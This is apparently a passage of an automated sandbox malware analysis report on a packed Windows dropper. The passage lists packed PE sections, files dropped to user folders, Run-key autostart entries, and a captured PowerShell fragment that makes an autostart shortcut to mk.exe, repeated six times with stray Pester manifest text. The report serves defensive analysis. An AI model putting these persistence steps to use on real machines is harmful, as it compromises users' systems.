Static PE information: Raw size of dhewrjwp is bigger than: 0x100000 < 0x19d600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2700275828.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 06d4af6f50.exe, 0000001A.00000003.3715728516.0000000007C20000.00000004.00001000.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3811262095.0000000005C42000.00000040.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3802419409.0000000008860000.00000004.00001000.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3906608143.0000000006432000.00000040.00000800.00020000.00000000.sdmp, ea44ea94c2.exe, 0000001F.00000003.3603714259.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, ea44ea94c2.exe, 0000001F.00000002.3739108759.0000000000CD2000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2700275828.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dhewrjwp:EW;uaqjjwio:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dhewrjwp:EW;uaqjjwio:EW;.taggant:EW;
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Unpacked PE file: 19.2.DocumentsKECBGCGCGI.exe.620000.0.unpack :EW;.rsrc:W;.idata :W;suzdiwdy:EW;otlnilqb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;suzdiwdy:EW;otlnilqb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;suzdiwdy:EW;otlnilqb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;suzdiwdy:EW;otlnilqb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Unpacked PE file: 26.2.06d4af6f50.exe.e70000.0.unpack :EW;.rsrc :W;.idata :W;vdmmmaet:EW;wxqjpqnl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;vdmmmaet:EW;wxqjpqnl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Unpacked PE file: 27.2.deb333ea90.exe.690000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dhewrjwp:EW;uaqjjwio:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dhewrjwp:EW;uaqjjwio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Unpacked PE file: 30.2.06d4af6f50.exe.e70000.0.unpack :EW;.rsrc :W;.idata :W;vdmmmaet:EW;wxqjpqnl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;vdmmmaet:EW;wxqjpqnl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Unpacked PE file: 31.2.ea44ea94c2.exe.cd0000.0.unpack :EW;.rsrc:W;.idata :W;ckqtwfzn:EW;wmhyjqub:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Unpacked PE file: 32.2.deb333ea90.exe.690000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dhewrjwp:EW;uaqjjwio:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dhewrjwp:EW;uaqjjwio:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: real checksum: 0x328538 should be: 0x32555d
Source: mk[1].exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x8e8696
Source: skotes.exe.19.dr	Static PE information: real checksum: 0x328538 should be: 0x32555d
Source: ea44ea94c2.exe.22.dr	Static PE information: real checksum: 0x2b776a should be: 0x2b9379
Source: 06d4af6f50.exe.22.dr	Static PE information: real checksum: 0x316004 should be: 0x312c2b
Source: deb333ea90.exe.22.dr	Static PE information: real checksum: 0x1bf6e7 should be: 0x1c37ea
Source: random[1].exe.22.dr	Static PE information: real checksum: 0x316004 should be: 0x312c2b
Source: mk.exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x8e8696
Source: file.exe	Static PE information: real checksum: 0x1bf6e7 should be: 0x1c37ea
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x2b776a should be: 0x2b9379
Source: random[1].exe0.22.dr	Static PE information: real checksum: 0x1bf6e7 should be: 0x1c37ea

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: dhewrjwp
Source: file.exe	Static PE information: section name: uaqjjwio
Source: file.exe	Static PE information: section name: .taggant
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name:
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name: suzdiwdy
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name: otlnilqb
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: ckqtwfzn
Source: random[1].exe.0.dr	Static PE information: section name: wmhyjqub
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: skotes.exe.19.dr	Static PE information: section name:
Source: skotes.exe.19.dr	Static PE information: section name: .idata
Source: skotes.exe.19.dr	Static PE information: section name: suzdiwdy
Source: skotes.exe.19.dr	Static PE information: section name: otlnilqb
Source: skotes.exe.19.dr	Static PE information: section name: .taggant
Source: mk[1].exe.22.dr	Static PE information: section name: .didata
Source: mk.exe.22.dr	Static PE information: section name: .didata
Source: random[1].exe.22.dr	Static PE information: section name:
Source: random[1].exe.22.dr	Static PE information: section name: .rsrc
Source: random[1].exe.22.dr	Static PE information: section name: .idata
Source: random[1].exe.22.dr	Static PE information: section name: vdmmmaet
Source: random[1].exe.22.dr	Static PE information: section name: wxqjpqnl
Source: random[1].exe.22.dr	Static PE information: section name: .taggant
Source: 06d4af6f50.exe.22.dr	Static PE information: section name:
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: .rsrc
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: .idata
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: vdmmmaet
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: wxqjpqnl
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: .taggant
Source: random[1].exe0.22.dr	Static PE information: section name:
Source: random[1].exe0.22.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.22.dr	Static PE information: section name: .idata
Source: random[1].exe0.22.dr	Static PE information: section name:
Source: random[1].exe0.22.dr	Static PE information: section name: dhewrjwp
Source: random[1].exe0.22.dr	Static PE information: section name: uaqjjwio
Source: random[1].exe0.22.dr	Static PE information: section name: .taggant
Source: deb333ea90.exe.22.dr	Static PE information: section name:
Source: deb333ea90.exe.22.dr	Static PE information: section name: .rsrc
Source: deb333ea90.exe.22.dr	Static PE information: section name: .idata
Source: deb333ea90.exe.22.dr	Static PE information: section name:
Source: deb333ea90.exe.22.dr	Static PE information: section name: dhewrjwp
Source: deb333ea90.exe.22.dr	Static PE information: section name: uaqjjwio
Source: deb333ea90.exe.22.dr	Static PE information: section name: .taggant
Source: ea44ea94c2.exe.22.dr	Static PE information: section name:
Source: ea44ea94c2.exe.22.dr	Static PE information: section name: .idata
Source: ea44ea94c2.exe.22.dr	Static PE information: section name: ckqtwfzn
Source: ea44ea94c2.exe.22.dr	Static PE information: section name: wmhyjqub
Source: ea44ea94c2.exe.22.dr	Static PE information: section name: .taggant

Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_0063D91C push ecx; ret	19_2_0063D92F
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00631359 push es; ret	19_2_0063135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_0079D91C push ecx; ret	20_2_0079D92F

Source: file.exe	Static PE information: section name: dhewrjwp entropy: 7.95215021711601
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name: entropy: 7.0847144450711586
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.801159258399344
Source: skotes.exe.19.dr	Static PE information: section name: entropy: 7.0847144450711586
Source: random[1].exe.22.dr	Static PE information: section name: entropy: 6.997913729034929
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: entropy: 6.997913729034929
Source: random[1].exe0.22.dr	Static PE information: section name: dhewrjwp entropy: 7.95215021711601
Source: deb333ea90.exe.22.dr	Static PE information: section name: dhewrjwp entropy: 7.95215021711601
Source: ea44ea94c2.exe.22.dr	Static PE information: section name: entropy: 7.801159258399344

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsKECBGCGCGI.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Jump to dropped file
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsKECBGCGCGI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mk[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsKECBGCGCGI.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea44ea94c2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deb333ea90.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 06d4af6f50.exe

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsKECBGCGCGI.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Powershell creates an autostart link

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. 